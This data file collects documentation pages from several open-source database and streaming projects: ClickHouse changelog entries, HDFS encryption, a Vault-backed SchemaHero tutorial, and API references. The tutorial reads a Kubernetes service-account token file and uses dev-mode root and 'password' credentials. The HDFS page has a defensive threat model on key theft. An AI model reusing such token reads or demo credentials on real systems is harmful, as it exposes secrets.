context to use --disable-compression If true, opt-out of response compression for all requests to the server --insecure-skip-tls-verify If true, the server's certificate will not be checked for validity. This will make your HTTPS connections insecure --kubeconfig string Path to the kubeconfig file to use for CLI requests. --match-server-version Require server version to match client version -n, --namespace string If present, the namespace scope for this CLI request --request-timeout string The length of time to wait before giving up on a single server request. Non-zero values should contain a corresponding time unit (e.g. 1s, 2m, 3h). A value of zero means don't timeout requests. (default \"0\") -s, --server string The address and port of the Kubernetes API server --tls-server-name string Server name to use for server certificate validation. If it is not provided, the hostname used to contact the server is used --token string Bearer token for authentication to the API server --user string The name of the kubeconfig user to use ``` - KubeBlocks operation commands." } ]
{ "category": "App Definition and Development", "file_name": "citibank.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"CitiBank\" icon: /images/logos/powered-by/citibank.png hasLink: \"https://www.citi.com/\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "2FA.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"2FA\" weight = 4 chapter = true +++ Two factor authentication (2FA) refers to the authentication method that combines both passport, and an object (credit card, SMS phone, token or biomarkers as fingerprint) to identify a user. To ensure the security of the committers account, we need you to enable 2FA to sign in and contribute codes on GitHub. More details, please refer to . To be noticed: If you do not enable 2FA, you will be removed from the project and unable to access our repositories and the fork from our private repository. For detailed operations, please refer to . After enabling 2FA, you need to sign in GitHub with the way of username/password + mobile phone authentication code. Tips: If you cannot download the APP through the page link, you can search and download Google Authenticator in APP Store. After enabling 2FA, you need to generate a private access Token to perform operations such as git submit and so on. At this time, you will use username + private access Token in replace of username + password to submit codes. For detailed operations, please refer to ." } ]
{ "category": "App Definition and Development", "file_name": "v20.11.7.16-stable.md", "project_name": "ClickHouse", "subcategory": "Database" }
[ { "data": "Backported in : Explicitly set uid / gid of clickhouse user & group to the fixed values (101) in clickhouse-server images. (). Backported in : Fix indeterministic functions with predicate optimizer. This fixes . (). Backported in : fix data type convert issue for mysql engine ... (). Backported in : Fix error when query `MODIFY COLUMN ... REMOVE TTL` doesn't actually remove column TTL. (). Backported in : Fix inserting a row with default value in case of parsing error in the last column. Fixes . (). Backported in : Fix possible incomplete query result while reading from `MergeTree` in case of read backoff (message `<Debug> MergeTreeReadPool: Will lower number of threads` in logs). Was introduced in . Fixes . (). Backported in : `SELECT JOIN` now requires the `SELECT` privilege on each of the joined tables. This PR fixes . (). Backported in : Fix possible crashes in aggregate functions with combinator `Distinct`, while using two-level aggregation. Fixes . (). Backported in : Fix index analysis of binary functions with constant argument which leads to wrong query results. This fixes . (). Backported in : Fix filling table `system.settingsprofileelements`. This PR fixes . (). Backported in : Restrict merges from wide to compact parts. In case of vertical merge it led to broken result part. (). Backported in : Fixed `value is too short` error when executing `toType(...)` functions (`toDate`, `toUInt32`, etc) with argument of type `Nullable(String)`. Now such functions return `NULL` on parsing errors instead of throwing exception. Fixes . (). Backported in : Disable constant folding for subqueries on the analysis stage, when the result cannot be calculated. (). Backported in : Proper support for 12AM in `parseDateTimeBestEffort` function. This fixes . (). Backported in : Disable write with AIO during merges because it can lead to extremely rare data corruption of primary key columns during merge. (). Backported in : Fix bug which may lead to `ALTER` queries hung after corresponding mutation kill. Found by thread fuzzer. (). Backported in : Fix possible `Pipeline stuck` error while using `ORDER BY` after subquery with `RIGHT` or `FULL` join. (). Backported in : Add FixedString Data type support. I'll get this exception \"Code: 50, e.displayText() = DB::Exception: Unsupported type FixedString(1)\" when replicating data from MySQL to ClickHouse. This patch fixes bug Also fixes . (). Backported in : Fix Logger with unmatched arg size. (). Backported in : Fixed `Attempt to read after eof` error when trying to `CAST` `NULL` from `Nullable(String)` to `Nullable(Decimal(P, S))`. Now function `CAST` returns `NULL` when it cannot parse decimal from nullable string. Fixes . (). Backported in : Asynchronous distributed INSERTs can be rejected by the server if the setting `networkcompressionmethod` is globally set to non-default value. This fixes . (). Backported in : Fix If combinator with unary function and Nullable types. (). Backported in : Fix possible hang at shutdown in clickhouse-local. This fixes . (). Backported in : Attach partition should reset the mutation. . (). Backported in : Fix bug when mutation with some escaped text (like `ALTER" }, { "data": "UPDATE e = CAST('foo', 'Enum8(\\'foo\\' = 1')` serialized incorrectly. Fixes . (). Backported in : Fixed very rare deadlock at shutdown. (). Backported in : Disable `optimizemovefunctionsoutof_any` because optimization is not always correct. This closes . This closes . (). Backported in : Fix inserting of `LowCardinality` column to table with `TinyLog` engine. Fixes . (). Backported in : Fix possible error `Expected single dictionary argument for function` if use function `ignore` with `LowCardinality` argument. Fixes . (). Backported in : Make sure `groupUniqArray` returns correct type for argument of Enum type. This closes . (). Backported in : Restrict `MODIFY TTL` queries for `MergeTree` tables created in old syntax. Previously the query succeeded, but actually it had no effect. (). Backported in : Fixed `There is no checkpoint` error when inserting data through http interface using `Template` or `CustomSeparated` format. Fixes . (). Backported in : Fix startup bug when clickhouse was not able to read compression codec from `LowCardinality(Nullable(...))` and throws exception `Attempt to read after EOF`. Fixes . (). Backported in : Fix infinite reading from file in `ORC` format (was introduced in ). Fixes . (). Backported in : Fix bug when concurrent `ALTER` and `DROP` queries may hang while processing ReplicatedMergeTree table. (). Backported in : Fix error `Cannot convert column now64() because it is constant but values of constants are different in source and result`. Continuation of . (). Backported in : Fix system.parts state column (LOGICALERROR when querying this column, due to incorrect order). (). Backported in : - Fix default value in join types with non-zero default (e.g. some Enums). Closes . (). Backported in : Fix possible buffer overflow in Uber H3 library. See https://github.com/uber/h3/issues/392. This closes . (). Backported in : Fixed very rare bug that might cause mutation to hang after `DROP/DETACH/REPLACE/MOVE PARTITION`. It was partially fixed by for the most cases. (). Backported in : Mark distributed batch as broken in case of empty data block in one of files. (). Backported in : Buffer overflow (on memory read) was possible if `addMonth` function was called with specifically crafted arguments. This fixes . This fixes . (). Backported in : Fix SIGSEGV with mergetreeminrowsforconcurrentread/mergetreeminbytesforconcurrentread=0/UINT64_MAX. (). Backported in : Query CREATE DICTIONARY id expression fix. (). Backported in : `DROP/DETACH TABLE table ON CLUSTER cluster SYNC` query might hang, it's fixed. Fixes . (). Backported in : Fix use-after-free of the CompressedWriteBuffer in Connection after disconnect. (). Backported in : Fix wrong result of function `neighbor` for `LowCardinality` argument. Fixes . (). Backported in : Some functions with big integers may cause segfault. Big integers is experimental feature. This closes . (). Backported in : Fix a segmentation fault in `bitmapAndnot` function. Fixes . (). Backported in : Fixed stack overflow when using accurate comparison of arithmetic type with string type. (). Backported in : In previous versions, unusual arguments for function arrayEnumerateUniq may cause crash or infinite loop. This closes . (). Backported in : Deadlock was possible if system.text_log is enabled. This fixes . (). Backported in : BloomFilter index crash fix. Fixes . (). Backported in : Update timezones info to 2020e. ()." } ]
{ "category": "App Definition and Development", "file_name": "README.md", "project_name": "SchemaHero", "subcategory": "Database" }
[ { "data": "The files in this directory are an example of using SchemaHero to manage a PostgreSQL database using credentials managed by HashiCorp Vault. Deploy a PostgreSQL and Vault instance to a new namespace. The following manifests were taken from the PostgreSQL and Vault Helm Charts. The vault chart is in dev mode and should be used for this tutorial only -- do not use for production. ``` kubectl create ns schemahero-vault kubectl apply -f ./postgresql/postgresql-11.8.0.yaml kubectl apply -f ./vault/vault.yaml ``` Next, enable the database secret engine: ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault secrets enable database ``` Now, we need to create a Vault role and config: ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault write database/roles/schemahero \\ db_name=airlinedb \\ creation_statements=\"CREATE ROLE \\\"{{name}}\\\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; \\ GRANT SELECT ON ALL TABLES IN SCHEMA public TO \\\"{{name}}\\\";\" \\ revocation_statements=\"ALTER ROLE \\\"{{name}}\\\" NOLOGIN;\"\\ default_ttl=\"1h\" \\ max_ttl=\"24h\" ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault write database/config/airlinedb \\ plugin_name=postgresql-database-plugin \\ allowed_roles=\"*\" \\ connection_url=\"postgresql://{{username}}:{{password}}@postgresql:5432/airlinedb?sslmode=disable\" \\ username=\"postgres\" \\ password=\"password\" ``` The following command will request a new username and password for our database. This is just confirming that Vault it working and has permissions. ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault read database/creds/schemahero ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault auth enable kubernetes ``` FROM YOUR COMPUTER (not in the vault pod): ``` kubectl -n schemahero-vault exec $(kubectl -n schemahero-vault get pods --selector \"app.kubernetes.io/instance=vault,component=server\" -o jsonpath=\"{.items[0].metadata.name}\") -c vault -- \\ sh -c ' \\ VAULT_TOKEN=root vault write auth/kubernetes/config \\ tokenreviewerjwt=\"$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" \\ kuberneteshost=https://${KUBERNETESPORT443TCP_ADDR}:443 \\ kubernetescacert=@/var/run/secrets/kubernetes.io/serviceaccount/ca.crt' ``` Create the policy ``` tee -a /tmp/policy.hcl > /dev/null <<EOT path \"database/creds/schemahero\" { capabilities = [\"read\"] } path \"database/config/airlinedb\" { capabilities = [\"read\"] } EOT ``` ``` kubectl -n schemahero-vault cp /tmp/policy.hcl vault-0:/tmp/policy.hcl ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault policy write schemahero /tmp/policy.hcl ``` ``` kubectl exec -n schemahero-vault -it vault-0 -- env VAULT_TOKEN=root vault write auth/kubernetes/role/schemahero \\ boundserviceaccount_names=schemahero \\ boundserviceaccount_namespaces=schemahero-vault \\ policies=schemahero \\ ttl=1h ``` Deploy the serviceaccount: ``` kubectl apply -f ./vault/sa.yaml ```" } ]
{ "category": "App Definition and Development", "file_name": "abortable.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. See accompanying LICENSE file. --> <!-- ============================================================= --> <!-- CLASS: FileSystem --> <!-- ============================================================= --> <!-- MACRO{toc|fromDepth=1|toDepth=2} --> Abort the active operation such that the output does not become manifest. Specifically, if supported on an , a successful `abort()` MUST guarantee that the stream will not be made visible in the `close()` operation. ```java @InterfaceAudience.Public @InterfaceStability.Unstable public interface Abortable { / Abort the active operation without the output becoming visible. * This is to provide ability to cancel the write on stream; once a stream is aborted, the write MUST NOT become visible. * @throws UnsupportedOperationException if the operation is not supported. @return the result. */ AbortableResult abort(); / Interface for the result of aborts; allows subclasses to extend (IOStatistics etc) or for future enhancements if ever needed. */ interface AbortableResult { / Was the stream already closed/aborted? @return true if a close/abort operation had already taken place. */ boolean alreadyClosed(); / Any exception caught during cleanup operations, exceptions whose raising/catching does not change the semantics of the abort. @return an exception or null. */ IOException anyCleanupException(); } } ``` Aborts the ongoing operation such that no output SHALL become visible when the operation is completed. Unless and until other File System classes implement `Abortable`, the interface is specified purely for output streams. `Abortable.abort()` MUST only be supported on output streams whose output is only made visible when `close()` is called, for example. output streams returned by the S3A FileSystem. The stream MUST implement `Abortable` and `StreamCapabilities`. ```python if unsupported: throw UnsupportedException if not isOpen(stream): no-op" }, { "data": "== True ``` After `abort()` returns, the filesystem MUST be unchanged: ``` FS' = FS ``` A successful `abort()` operation MUST guarantee that when the stream` close()` is invoked no output shall be manifest. The stream MUST retry any remote calls needed to force the abort outcome. If any file was present at the destination path, it MUST remain unchanged. Strictly then: if `Abortable.abort()` does not raise `UnsupportedOperationException` then returns, then it guarantees that the write SHALL NOT become visible and that any existing data in the filesystem at the destination path SHALL continue to be available. Calls to `write()` methods MUST fail. Calls to `flush()` MUST be no-ops (applications sometimes call this on closed streams) Subsequent calls to `abort()` MUST be no-ops. `close()` MUST NOT manifest the file, and MUST NOT raise an exception That is, the postconditions of `close()` becomes: ``` FS' = FS ``` If temporary data is stored in the local filesystem or in the store's upload infrastructure then this MAY be cleaned up; best-effort is expected here. The stream SHOULD NOT retry cleanup operations; any failure there MUST be caught and added to `AbortResult` The `AbortResult` value returned is primarily for testing and logging. `alreadyClosed()`: MUST return `true` if the write had already been aborted or closed; `anyCleanupException();`: SHOULD return any IOException raised during any optional cleanup operations. Output streams themselves aren't formally required to be thread safe, but as applications do sometimes assume they are, this call MUST be thread safe. An application MUST be able to verify that a stream supports the `Abortable.abort()` operation without actually calling it. This is done through the `StreamCapabilities` interface. If a stream instance supports `Abortable` then it MUST return `true` in the probe `hasCapability(\"fs.capability.outputstream.abortable\")` If a stream instance does not support `Abortable` then it MUST return `false` in the probe `hasCapability(\"fs.capability.outputstream.abortable\")` That is: if a stream declares its support for the feature, a call to `abort()` SHALL meet the defined semantics of the operation. FileSystem/FileContext implementations SHOULD declare support similarly, to allow for applications to probe for the feature in the destination directory/path. If a filesystem supports `Abortable` under a path `P` then it SHOULD return `true` to `PathCababilities.hasPathCapability(path, \"fs.capability.outputstream.abortable\")` This is to allow applications to verify that the store supports the feature. If a filesystem does not support `Abortable` under a path `P` then it MUST return `false` to `PathCababilities.hasPathCapability(path, \"fs.capability.outputstream.abortable\")`" } ]
{ "category": "App Definition and Development", "file_name": "TransparentEncryption.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. See accompanying LICENSE file. --> Transparent Encryption in HDFS ============================== <!-- MACRO{toc|fromDepth=0|toDepth=2} --> Overview -- HDFS implements transparent, end-to-end encryption. Once configured, data read from and written to special HDFS directories is transparently encrypted and decrypted without requiring changes to user application code. This encryption is also end-to-end, which means the data can only be encrypted and decrypted by the client. HDFS never stores or has access to unencrypted data or unencrypted data encryption keys. This satisfies two typical requirements for encryption: at-rest encryption (meaning data on persistent media, such as a disk) as well as in-transit encryption (e.g. when data is travelling over the network). Background Encryption can be done at different layers in a traditional data management software/hardware stack. Choosing to encrypt at a given layer comes with different advantages and disadvantages. Application-level encryption*. This is the most secure and most flexible approach. The application has ultimate control over what is encrypted and can precisely reflect the requirements of the user. However, writing applications to do this is hard. This is also not an option for customers of existing applications that do not support encryption. Database-level encryption*. Similar to application-level encryption in terms of its properties. Most database vendors offer some form of encryption. However, there can be performance issues. One example is that indexes cannot be encrypted. Filesystem-level encryption*. This option offers high performance, application transparency, and is typically easy to deploy. However, it is unable to model some application-level policies. For instance, multi-tenant applications might want to encrypt based on the end user. A database might want different encryption settings for each column stored within a single file. Disk-level encryption*. Easy to deploy and high performance, but also quite inflexible. Only really protects against physical theft. HDFS-level encryption fits between database-level and filesystem-level encryption in this stack. This has a lot of positive effects. HDFS encryption is able to provide good performance and existing Hadoop applications are able to run transparently on encrypted data. HDFS also has more context than traditional filesystems when it comes to making policy decisions. HDFS-level encryption also prevents attacks at the filesystem-level and below (so-called \"OS-level attacks\"). The operating system and disk only interact with encrypted bytes, since the data is already encrypted by HDFS. Use Cases Data encryption is required by a number of different government, financial, and regulatory entities. For example, the health-care industry has HIPAA regulations, the card payment industry has PCI DSS regulations, and the US government has FISMA regulations. Having transparent encryption built into HDFS makes it easier for organizations to comply with these" }, { "data": "Encryption can also be performed at the application-level, but by integrating it into HDFS, existing applications can operate on encrypted data without changes. This integrated architecture implies stronger encrypted file semantics and better coordination with other HDFS functions. Architecture For transparent encryption, we introduce a new abstraction to HDFS: the encryption zone. An encryption zone is a special directory whose contents will be transparently encrypted upon write and transparently decrypted upon read. Each encryption zone is associated with a single encryption zone key which is specified when the zone is created. Each file within an encryption zone has its own unique data encryption key (DEK). DEKs are never handled directly by HDFS. Instead, HDFS only ever handles an encrypted data encryption key (EDEK). Clients decrypt an EDEK, and then use the subsequent DEK to read and write data. HDFS datanodes simply see a stream of encrypted bytes. A very important use case of encryption is to \"switch it on\" and ensure all files across the entire filesystem are encrypted. To support this strong guarantee without losing the flexibility of using different encryption zone keys in different parts of the filesystem, HDFS allows nested encryption zones. After an encryption zone is created (e.g. on the root directory `/`), a user can create more encryption zones on its descendant directories (e.g. `/home/alice`) with different keys. The EDEK of a file will be generated using the encryption zone key from the closest ancestor encryption zone. A new cluster service is required to manage encryption keys: the Hadoop Key Management Server (KMS). In the context of HDFS encryption, the KMS performs three basic responsibilities: Providing access to stored encryption zone keys Generating new encrypted data encryption keys for storage on the NameNode Decrypting encrypted data encryption keys for use by HDFS clients The KMS will be described in more detail below. When creating a new file in an encryption zone, the NameNode asks the KMS to generate a new EDEK encrypted with the encryption zone's key. The EDEK is then stored persistently as part of the file's metadata on the NameNode. When reading a file within an encryption zone, the NameNode provides the client with the file's EDEK and the encryption zone key version used to encrypt the EDEK. The client then asks the KMS to decrypt the EDEK, which involves checking that the client has permission to access the encryption zone key version. Assuming that is successful, the client uses the DEK to decrypt the file's contents. All of the above steps for the read and write path happen automatically through interactions between the DFSClient, the NameNode, and the KMS. Access to encrypted file data and metadata is controlled by normal HDFS filesystem permissions. This means that if HDFS is compromised (for example, by gaining unauthorized access to an HDFS superuser account), a malicious user only gains access to ciphertext and encrypted keys. However, since access to encryption zone keys is controlled by a separate set of permissions on the KMS and key store, this does not pose a security" }, { "data": "The KMS is a proxy that interfaces with a backing key store on behalf of HDFS daemons and clients. Both the backing key store and the KMS implement the Hadoop KeyProvider API. See the for more information. In the KeyProvider API, each encryption key has a unique key name. Because keys can be rolled, a key can have multiple key versions, where each key version has its own key material (the actual secret bytes used during encryption and decryption). An encryption key can be fetched by either its key name, returning the latest version of the key, or by a specific key version. The KMS implements additional functionality which enables creation and decryption of encrypted encryption keys (EEKs). Creation and decryption of EEKs happens entirely on the KMS. Importantly, the client requesting creation or decryption of an EEK never handles the EEK's encryption key. To create a new EEK, the KMS generates a new random key, encrypts it with the specified key, and returns the EEK to the client. To decrypt an EEK, the KMS checks that the user has access to the encryption key, uses it to decrypt the EEK, and returns the decrypted encryption key. In the context of HDFS encryption, EEKs are encrypted data encryption keys (EDEKs), where a data encryption key (DEK) is what is used to encrypt and decrypt file data. Typically, the key store is configured to only allow end users access to the keys used to encrypt DEKs. This means that EDEKs can be safely stored and handled by HDFS, since the HDFS user will not have access to unencrypted encryption keys. Configuration A necessary prerequisite is an instance of the KMS, as well as a backing key store for the KMS. See the for more information. Once a KMS has been set up and the NameNode and HDFS clients have been correctly configured, an admin can use the `hadoop key` and `hdfs crypto` command-line tools to create encryption keys and set up new encryption zones. Existing data can be encrypted by copying it into the new encryption zones using tools like distcp. The KeyProvider to use when interacting with encryption keys used when reading and writing to an encryption zone. HDFS clients will use the provider path returned from Namenode via getServerDefaults. If namenode doesn't support returning key provider uri then client's conf will be used. The prefix for a given crypto codec, contains a comma-separated list of implementation classes for a given crypto codec (eg EXAMPLECIPHERSUITE). The first implementation will be used if available, others are fallbacks. Default: `org.apache.hadoop.crypto.OpensslAesCtrCryptoCodec, org.apache.hadoop.crypto.JceAesCtrCryptoCodec` Comma-separated list of crypto codec implementations for AES/CTR/NoPadding. The first implementation will be used if available, others are fallbacks. Default: `org.apache.hadoop.crypto.OpensslSm4CtrCryptoCodec, org.apache.hadoop.crypto.JceSm4CtrCryptoCodec` Comma-separated list of crypto codec implementations for SM4/CTR/NoPadding. The first implementation will be used if available, others are fallbacks. Default: `AES/CTR/NoPadding` Cipher suite for crypto codec, now AES/CTR/NoPadding and SM4/CTR/NoPadding are supported. Default: None The JCE provider name used in CryptoCodec. Default: `8192` The buffer size used by CryptoInputStream and" }, { "data": "Default: `100` When listing encryption zones, the maximum number of zones that will be returned in a batch. Fetching the list incrementally in batches improves namenode performance. `crypto` command-line interface Usage: `[-createZone -keyName <keyName> -path <path>]` Create a new encryption zone. | | | |:- |:- | | path | The path of the encryption zone to create. It must be an empty directory. A trash directory is provisioned under this path.| | keyName | Name of the key to use for the encryption zone. Uppercase key names are unsupported. | Usage: `[-listZones]` List all encryption zones. Requires superuser permissions. Usage: `[-provisionTrash -path <path>]` Provision a trash directory for an encryption zone. | | | |:- |:- | | path | The path to the root of the encryption zone. | Usage: `[-getFileEncryptionInfo -path <path>]` Get encryption information from a file. This can be used to find out whether a file is being encrypted, and the key name / key version used to encrypt it. | | | |:- |:- | | path | The path of the file to get encryption information. | Usage: `[-reencryptZone <action> -path <zone>]` Re-encrypts an encryption zone, by iterating through the encryption zone, and calling the KeyProvider's reencryptEncryptedKeys interface to batch-re-encrypt all files' EDEKs with the latest version encryption zone key in the key provider. Requires superuser permissions. Note that re-encryption does not apply to snapshots, due to snapshots' immutable nature. | | | |:- |:- | | action | The re-encrypt action to perform. Must be either `-start` or `-cancel`. | | path | The path to the root of the encryption zone. | Re-encryption is a NameNode-only operation in HDFS, so could potentially put intensive load to the NameNode. The following configurations can be changed to control the stress on the NameNode, depending on the acceptable throughput impact to the cluster. | | | |:- |:- | | dfs.namenode.reencrypt.batch.size | The number of EDEKs in a batch to be sent to the KMS for re-encryption. Each batch is processed when holding the name system read/write lock, with throttling happening between batches. See configs below. | | dfs.namenode.reencrypt.throttle.limit.handler.ratio | Ratio of read locks to be held during re-encryption. 1.0 means no throttling. 0.5 means re-encryption can hold the readlock at most 50% of its total processing time. Negative value or 0 are invalid. | | dfs.namenode.reencrypt.throttle.limit.updater.ratio | Ratio of write locks to be held during re-encryption. 1.0 means no throttling. 0.5 means re-encryption can hold the writelock at most 50% of its total processing time. Negative value or 0 are invalid. | Usage: `[-listReencryptionStatus]` List re-encryption information for all encryption zones. Requires superuser permissions. Example usage These instructions assume that you are running as the normal user or HDFS superuser as is appropriate. Use `sudo` as needed for your environment. hadoop key create mykey hadoop fs -mkdir /zone hdfs crypto -createZone -keyName mykey -path /zone hadoop fs -chown myuser:myuser /zone hadoop fs -put helloWorld /zone hadoop fs -cat /zone/helloWorld hdfs crypto -getFileEncryptionInfo -path /zone/helloWorld Distcp considerations One common usecase for distcp is to replicate data between clusters for backup and disaster recovery" }, { "data": "This is typically performed by the cluster administrator, who is an HDFS superuser. To enable this same workflow when using HDFS encryption, we introduced a new virtual path prefix, `/.reserved/raw/`, that gives superusers direct access to the underlying block data in the filesystem. This allows superusers to distcp data without needing having access to encryption keys, and also avoids the overhead of decrypting and re-encrypting data. It also means the source and destination data will be byte-for-byte identical, which would not be true if the data was being re-encrypted with a new EDEK. When using `/.reserved/raw` to distcp encrypted data, it's important to preserve extended attributes with the flag. This is because encrypted file attributes (such as the EDEK) are exposed through extended attributes within `/.reserved/raw`, and must be preserved to be able to decrypt the file. This means that if the distcp is initiated at or above the encryption zone root, it will automatically create an encryption zone at the destination if it does not already exist. However, it's still recommended that the admin first create identical encryption zones on the destination cluster to avoid any potential mishaps. By default, distcp compares checksums provided by the filesystem to verify that the data was successfully copied to the destination. When copying from unencrypted or encrypted location into an encrypted location, the filesystem checksums will not match since the underlying block data is different because a new EDEK will be used to encrypt at destination. In this case, specify the and distcp flags to avoid verifying checksums. Rename and Trash considerations HDFS restricts file and directory renames across encryption zone boundaries. This includes renaming an encrypted file / directory into an unencrypted directory (e.g., `hdfs dfs mv /zone/encryptedFile /home/bob`), renaming an unencrypted file or directory into an encryption zone (e.g., `hdfs dfs mv /home/bob/unEncryptedFile /zone`), and renaming between two different encryption zones (e.g., `hdfs dfs mv /home/alice/zone1/foo /home/alice/zone2`). In these examples, `/zone`, `/home/alice/zone1`, and `/home/alice/zone2` are encryption zones, while `/home/bob` is not. A rename is only allowed if the source and destination paths are in the same encryption zone, or both paths are unencrypted (not in any encryption zone). This restriction enhances security and eases system management significantly. All file EDEKs under an encryption zone are encrypted with the encryption zone key. Therefore, if the encryption zone key is compromised, it is important to identify all vulnerable files and re-encrypt them. This is fundamentally difficult if a file initially created in an encryption zone can be renamed to an arbitrary location in the filesystem. To comply with the above rule, each encryption zone has its own `.Trash` directory under the \"zone directory\". E.g., after `hdfs dfs rm /zone/encryptedFile`, `encryptedFile` will be moved to `/zone/.Trash`, instead of the `.Trash` directory under the user's home directory. When the entire encryption zone is deleted, the \"zone directory\" will be moved to the `.Trash` directory under the user's home directory. If the encryption zone is the root directory (e.g., `/` directory), the trash path of root directory is `/.Trash`, not the" }, { "data": "directory under the user's home directory, and the behavior of renaming sub-directories or sub-files in root directory will keep consistent with the behavior in a general encryption zone, such as `/zone` which is mentioned at the top of this section. The `crypto` command before Hadoop 2.8.0 does not provision the `.Trash` directory automatically. If an encryption zone is created before Hadoop 2.8.0, and then the cluster is upgraded to Hadoop 2.8.0 or above, the trash directory can be provisioned using `-provisionTrash` option (e.g., `hdfs crypto -provisionTrash -path /zone`). Attack vectors -- These exploits assume that attacker has gained physical access to hard drives from cluster machines, i.e. datanodes and namenodes. Access to swap files of processes containing data encryption keys. By itself, this does not expose cleartext, as it also requires access to encrypted block files. This can be mitigated by disabling swap, using encrypted swap, or using mlock to prevent keys from being swapped out. Access to encrypted block files. By itself, this does not expose cleartext, as it also requires access to DEKs. These exploits assume that attacker has gained root shell access to cluster machines, i.e. datanodes and namenodes. Many of these exploits cannot be addressed in HDFS, since a malicious root user has access to the in-memory state of processes holding encryption keys and cleartext. For these exploits, the only mitigation technique is carefully restricting and monitoring root shell access. Access to encrypted block files. By itself, this does not expose cleartext, as it also requires access to encryption keys. Dump memory of client processes to obtain DEKs, delegation tokens, cleartext. No mitigation. Recording network traffic to sniff encryption keys and encrypted data in transit. By itself, insufficient to read cleartext without the EDEK encryption key. Dump memory of datanode process to obtain encrypted block data. By itself, insufficient to read cleartext without the DEK. Dump memory of namenode process to obtain encrypted data encryption keys. By itself, insufficient to read cleartext without the EDEK's encryption key and encrypted block files. These exploits assume that the attacker has compromised HDFS, but does not have root or `hdfs` user shell access. Access to encrypted block files. By itself, insufficient to read cleartext without the EDEK and EDEK encryption key. Access to encryption zone and encrypted file metadata (including encrypted data encryption keys), via -fetchImage. By itself, insufficient to read cleartext without EDEK encryption keys. A rogue user can collect keys of files they have access to, and use them later to decrypt the encrypted data of those files. As the user had access to those files, they already had access to the file contents. This can be mitigated through periodic key rolling policies. The command is usually required after key rolling, to make sure the EDEKs on existing files use the new version key. Manual steps to a complete key rolling and re-encryption are listed below. These instructions assume that you are running as the key admin or HDFS superuser as is appropriate. hadoop key roll exposedKey hdfs crypto -listZones hdfs crypto -reencryptZone -start -path /zone hdfs crypto -listReencryptionStatus hdfs crypto -getFileEncryptionInfo -path /zone/helloWorld" } ]
{ "category": "App Definition and Development", "file_name": "json_each.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" Expands the outermost elements of a JSON object into a set of key-value pairs held in two columns and returns a table that consists of one row for each element. ```Haskell jsoneach(jsonobject_expr) ``` `jsonobjectexpr`: the expression that represents the JSON object. The object can be a JSON column, or a JSON object that is produced by a JSON constructor function such as PARSE_JSON. Returns two columns: one named key and one named value. The key column stores VARCHAR values, and the value column stores JSON values. The jsoneach function is a table function that returns a table. The returned table is a result set that consists of multiple rows. Therefore, a lateral join must be used in the FROM clause to join the returned table to the original table. The lateral join is mandatory, but the LATERAL keyword is optional. The jsoneach function cannot be used in the SELECT clause. ```plaintext -- A table named tj is used as an example. In the tj table, the j column is a JSON object. mysql> SELECT * FROM tj; +++ | id | j | +++ | 1 | {\"a\": 1, \"b\": 2} | | 3 | {\"a\": 3} | +++ -- Expand the j column of the tj table into two columns by key and value to obtain a result set that consists of multiple rows. In this example, the LATERAL keyword is used to join the result set to the tj table. mysql> SELECT * FROM tj, LATERAL json_each(j); ++++-+ | id | j | key | value | ++++-+ | 1 | {\"a\": 1, \"b\": 2} | a | 1 | | 1 | {\"a\": 1, \"b\": 2} | b | 2 | | 3 | {\"a\": 3} | a | 3 | ++++-+ ```" } ]
{ "category": "App Definition and Development", "file_name": "pexpireat.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: PEXPIREAT linkTitle: PEXPIREAT description: PEXPIREAT menu: preview: parent: api-yedis weight: 2234 aliases: /preview/api/redis/pexpireat /preview/api/yedis/pexpireat type: docs `PEXPIREAT key ttl-as-timestamp` PEXPIREAT has the same effect as EXPIREAT, but the Unix timestamp at which the key will expire is specified in milliseconds instead of seconds. Returns integer reply, specifically 1 if the timeout was set and 0 if key does not exist. ```sh $ SET yugakey \"Yugabyte\" ``` ``` \"OK\" ``` ```sh $ PEXPIREAT yugakey 1555555555005 ``` ``` (integer) 1 ``` ```sh $ PTTL yugakey ``` ``` (integer) 18674452994 ``` , , ," } ]
{ "category": "App Definition and Development", "file_name": "primer.md", "project_name": "VoltDB", "subcategory": "Database" }
